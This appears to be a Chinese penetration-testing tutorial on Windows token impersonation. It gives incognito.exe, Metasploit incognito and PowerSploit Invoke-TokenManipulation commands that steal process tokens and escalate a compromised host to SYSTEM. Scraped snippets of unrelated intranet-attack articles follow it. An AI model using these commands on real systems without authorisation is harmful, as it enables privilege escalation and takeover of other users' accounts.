msf實戰假冒令牌提權
令牌(token)是系統的臨時秘鑰,相當於賬號和密碼,用來決定是否允許這次請求和判斷這次請求是屬於哪乙個使用者的。它允許你在不提供密碼或其他憑證的前提下,訪問網路和系統資源,這些令牌將持續存在於系統中,除非系統重新啟動。令牌最大的特點就是隨機性,不可**,黑客或軟體無法猜測出令牌。
假冒令牌可以假冒乙個網路中的另乙個使用者進行各類操作。所以當乙個攻擊者需要域管理員的操作許可權時候,需要通過假冒域管理員的令牌進行攻擊。
令牌有很多種:
windows的accesstoken有兩種型別:
注:兩種token只在系統重啟後清除 具有delegation token
的使用者在登出後,該token將變成impersonation token
,依舊有效。
accesstoken的竊取與利用需要administrator管理員許可權。也就是說要提權。
竊取accesstoken的方法:
incognito.exe程式 、invoketokenmanipulat.ps1指令碼 、msf裡的incognito模組
accesstoken的列舉(需要administrator許可權)
操作:模擬其他使用者的令牌(複製token)如果要使用accesstoken模擬其他使用者,可以使用命令
incognito.exe execute -c "完整的token名" cmd.exe
例如:模擬system許可權使用者(提權至system):
incognito.exe execute -c "nt authority\system" cmd.exe
降權至當前使用者:
incognito.exe execute -c "當前使用者token" cmd.exe
需要administrator許可權
use incognito #載入incognito
list_tokens -u #列出accesstoken
getuid #檢視當前token
impersonate_token "nt authority\system"
#模擬system使用者,getsystem命令即實現了該命令。如果要模擬其他使用者,將token名改為其他使用者即可
steal_token 1252
#從程序竊取token
getsystem #提公升至system許可權
rev2self #返回到之前的accesstoken許可權
這個指令碼是powersploit下exfiltration資料夾內的乙個指令碼
使用命令如下:
列舉token:
invoke
-tokenmanipulation
-enumerate
提權至system:
invoke
-tokenmanipulation
-createprocess
"cmd.exe"
-username
"nt authoritysystem"
複製(竊取)程序token:
invoke
-tokenmanipulation
-createprocess
"cmd.exe"
-processid
500複製(竊取)執行緒token:
假設我們現在已經獲得了目標主機的許可權,但是通過 getsystem 和其他方式提權失敗。
此時,我們可以嘗試使用假冒令牌進行提權。
use incognito #進入incognito模組
list_tokens -u #列出令牌
如圖,可以看到有兩種型別的令牌。
令牌的資料取決於當前獲取許可權的高低。
當前列出了3個令牌。我們就可以通過下面的命令假冒 administrator 使用者了。
impersonate_token win2008\\adminstrator #假冒win2008\adminstrator 的令牌
impersonate_token win2008\\test #假冒win2008\test 的令牌
impersonate_token "nt authority\system"
#假冒system的令牌
從程序竊取令牌
steal_token 1252
返回之前的token
原文:
內網滲透之dns劫持
dns欺騙,被攻擊的主機訪問任意 的回被轉到特定的釣魚 實驗工具 kali linux 黑客機 win10 肉雞 apache2 ettercap 操作步驟 1,開啟kali上的apache2服務,kali service apache2 start root kali service apache...
內網滲透 內網滲透測試基礎 1
內網也指區域網 local area network 是指在某一區域內由多台計算機互聯而成的計算機組,組網範圍通常在數千公尺以內。在區域網中,可以實現檔案管理 應用軟體共享 印表機共享 工作組內的日程安排 電子郵件和傳真通訊服務等。內網是封閉的,可以由辦公室內的兩台計算機組成,也可以由乙個公司內的大...
再談內網滲透
前言 看了 g.r0b1n文章 內網滲透 抑制不住自己衝動的心情,寫一篇 再談內網滲透 希望以後有朋友能更新 詳談內網滲透 在我的腦子裡面我始終認為,一次滲透至少要控制被滲透物件80 以上伺服器才能算得上一次成功的滲透。希望朋友們能夠多提寶貴意見。正文 我沒有內網域裡面某個機器的許可權,我只有乙個存...